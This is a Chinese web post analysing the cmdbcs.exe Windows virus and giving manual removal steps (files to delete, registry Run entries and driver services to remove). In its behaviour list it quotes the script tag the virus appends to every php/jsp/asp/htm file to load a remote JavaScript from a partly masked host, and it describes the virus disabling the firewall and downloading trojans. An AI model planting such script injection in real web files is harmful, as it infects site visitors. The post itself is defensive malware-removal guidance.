网站地图
zenghuilan.com
生活小窍门 解释生活中的一切名词
cmdbcs.exe 发布于:

cmdbcs.exe是一个病毒文件。

最近电脑突然卡,发现进程了多了很多个cmdbcs.exe

感觉不对,马上从收藏夹里找到在线杀毒http://www.antidu.cn/board/online/ 查杀

果然,瑞星报毒!!!

1.病毒运行后,释放如下副本以及文件:

%systemroot%\system32\wxptdi.sys

2.释放一个批处理停止Windows 防火墙服务

3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年

4.启动一个空壳的wuauclt.exe 把%systemroot%\system32\wxptdi.sys(其实和ntuser.com是同一个文件)的代码完全注入进去

5.感染全盘的php jsp asp htm html文件 在后面写入<script language=javascript src=http://cc.18d***.net/1.js></script>的代码

6.wuauclt.exe执行下载木马的操作

读取http://*.com/elf_listo.txt的文件列表

下载27个木马和病毒 到c:\Program Files下面 分别命名为csrss0.exe~csrss9.exe csrssa.exe~csrsst.exe

清除办法:

下载sreng:http://www.antidu.cn/board/helpst/

1.删除:

%systemroot%\system32\drivers\msconkt.sys

%systemroot%\system32\AVPSrv.dll

%systemroot%\system32\cmdbcs.dll

%systemroot%\system32\DbgHlp32.dll

%systemroot%\system32\Kvsc3.dll

%systemroot%\system32\LYLOADER.EXE

%systemroot%\system32\LYMANGR.DLL

%systemroot%\system32\MSDEG32.DLL

%systemroot%\system32\NVDispDrv.dll

%systemroot%\system32\REGKEY.hiv

%systemroot%\system32\SSLDyn.dll

%systemroot%\system32\wxptdi.sys

%systemroot%\608769L.exe

%systemroot%\608769M.exe

%systemroot%\608769MM.DLL

%systemroot%\608769WL.DLL

%systemroot%\AVPSrv.exE

%systemroot%\cmdbcs.exe

%systemroot%\DbgHlp32.exe

%systemroot%\Kvsc3.exE

%systemroot%\NVDispDRV.EXE

%systemroot%\SSLDyn.exE

%systemroot%\system32\fat32.sys(%systemroot%为环境变量,表示你的系统文件夹安装位置,对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推)

2.重启之后

打开sreng

启动项目 注册表 删除如下项目

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

<SSLDyn><%systemroot%\SSLDyn.exE> []

<cmdbcs><%systemroot%\cmdbcs.exe> []

<WinSysM><%systemroot%\608769M.exe> []

<WinSysW><%systemroot%\608769L.exe> []

<Kvsc3><%systemroot%\Kvsc3.exE> []

<AVPSrv><%systemroot%\AVPSrv.exE> []

<NVDispDrv><%systemroot%\aorwpw.exe> [N/A]

<DbgHlp32><%systemroot%\DbgHlp32.exe> []

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”,

选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:

[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]

<system32\DRIVERS\msconkt.sys><N/A>(之前的comint32.sys变种)

[RAS Asynchronous Media Driver / CCDEcode][Running/Auto Start]

<system32\DRIVERS\msconkt.sys><N/A>

[PciHardDisk / PciHardDisk][Stopped/Manual Start]

<\??\%systemroot%\system32\fat32.sys><N/A>(机器狗病毒变种)

3.清除机器狗病毒

参考http://www.antidu.cn/html/1/2007/12/antidu_20071217212429.html

解决方法第三点即可

4.清除GD*I32.dll,bj*rl.dll,addr*help.dll木马群

参考http://www.antidu.cn/html/1/2007/12/antidu_20071210194454.html即可


相关文章推荐:
收藏夹 | 在线杀毒 | 瑞星 | html文件 | 环境变量 | 系统文件夹 | 系统盘 | 驱动程序 | 微软 | 机器狗病毒 |